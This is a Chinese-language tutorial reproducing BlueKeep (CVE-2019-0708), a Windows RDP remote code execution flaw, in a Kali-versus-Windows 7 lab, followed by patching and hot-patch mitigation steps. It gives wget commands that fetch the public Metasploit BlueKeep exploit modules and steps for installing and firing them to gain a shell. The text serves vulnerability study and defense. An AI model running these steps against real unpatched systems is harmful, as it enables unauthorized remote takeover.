一、漏洞說明
2019年5月15日微軟發(fā)布安全補(bǔ)丁修復(fù)了CVE編號(hào)為CVE-2019-0708的Windows遠(yuǎn)程桌面服務(wù)(RDP)遠(yuǎn)程代碼執(zhí)行漏洞,該漏洞在不需身份認(rèn)證的情況下即可遠(yuǎn)程觸發(fā),危害與影響面極大。
目前,9月7日EXP代碼已被公開發(fā)布至metasploit-framework
的Pull requests中,經(jīng)測試已經(jīng)可以遠(yuǎn)程代碼執(zhí)行。
二、漏洞影響版本
Windows 7
Windows server 2008 R2
Windows server 2008
Windows 2003
Windows xp
注:Windows 8和windows10以及之后的版本不受此漏洞影響
三、漏洞環(huán)境搭建
攻擊機(jī):kali 2018.2
靶機(jī):win7 sp1 7061
![](/d/20211016/287638238a1c763c1d0707203d24e361.gif)
四、漏洞復(fù)現(xiàn)
1、更新msf
apt-get update
apt-get install metasploit-framework
![](/d/20211016/8c0fb3a91bc14c5f8bbab543553cbfe8.gif)
2、下載攻擊套件
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
3、替換msf中相應(yīng)的文件
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
rdp.rb 替換 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb 替換 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb 替換 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
4、啟動(dòng)msf,加載文件
![](/d/20211016/4bb0e302695d0264fc29050915d09c55.gif)
5、搜索0708,可以看到文件成功加載
![](/d/20211016/401ee743c2f317c46690fa841999792a.gif)
6、利用漏洞,設(shè)置rhosts、target、payload
![](/d/20211016/60b5a1fcb483da1e16f0cfb3bd1253bc.gif)
![](/d/20211016/98dc1a2c8b0b8c9667dafa37ec56af7d.gif)
![](/d/20211016/74184d6198c631c86b767cd2d2946830.gif)
![](/d/20211016/62302ea7933973d3c4afcb9f0796d8cc.gif)
7、開始執(zhí)行exp,成功獲得shell
![](/d/20211016/04b689a43f7ffbff5941d49a5ee62d0c.gif)
![](/d/20211016/6ea147a18b8d79759cace3d7c956cdb5.gif)
五、漏洞防御
1、熱補(bǔ)丁修復(fù)工具下載,下載地址: https://www.qianxin.com/other/CVE-2019-0708
注: CVE-2019-0708熱補(bǔ)丁工具”是針對(duì)“Windows遠(yuǎn)程桌面服務(wù)的遠(yuǎn)程代碼執(zhí)行漏洞CVE-2019-0708”推出的熱補(bǔ)丁修復(fù)工具,可以針對(duì)不能直接打補(bǔ)丁環(huán)境,提供的臨時(shí)解決漏洞問題的方案?!?/p>
下載文件進(jìn)行解壓。
2、 使用win+R快捷鍵或開始菜單選擇“運(yùn)行”,輸入cmd。調(diào)起命令行工具。
3、 在命令行工具,執(zhí)行命令到工具所在文件夾
4、 輸入命令對(duì)應(yīng)功能,啟用熱補(bǔ)丁命令:QKShield.exe /enable ;禁用熱補(bǔ)丁命令:QKShield.exe/disable 。
5、 重啟系統(tǒng)后,需要重新運(yùn)行命令行來啟用熱補(bǔ)丁
2、啟用熱補(bǔ)丁
![](/d/20211016/c316ea579343f79163717095b2944aa3.gif)
3、再次檢測是否存在漏洞,可以看到打完熱補(bǔ)丁之后,不存在漏洞了
![](/d/20211016/d23e86f0c3d932a0cb21c492897ccc3d.gif)
4、打補(bǔ)丁,漏洞修復(fù)工具下載,下載地址: https://www.qianxin.com/other/CVE-2019-0708
![](/d/20211016/d4875dc1ca6fa54e2442aef7f4e20030.gif)
5、點(diǎn)擊”立即修復(fù)”,完成安裝之后,重啟電腦
![](/d/20211016/5a4eb0bf371d125a72e4eeb6cc19b780.gif)
![](/d/20211016/547b924d7460f84117a07fdbc4f71bb5.gif)
6、使用漏洞掃描工具檢測是否存在漏洞,掃描工具下載地址: https://www.qianxin.com/other/CVE-2019-0708
![](/d/20211016/6a188e4ff1e28471f03af6eeea6e3b21.gif)
總結(jié)
以上所述是小編給大家介紹的Windows CVE-2019-0708 遠(yuǎn)程桌面代碼執(zhí)行漏洞復(fù)現(xiàn)問題,希望對(duì)大家有所幫助,如果大家有任何疑問請(qǐng)給我留言,小編會(huì)及時(shí)回復(fù)大家的。在此也非常感謝大家對(duì)腳本之家網(wǎng)站的支持!
如果你覺得本文對(duì)你有幫助,歡迎轉(zhuǎn)載,煩請(qǐng)注明出處,謝謝!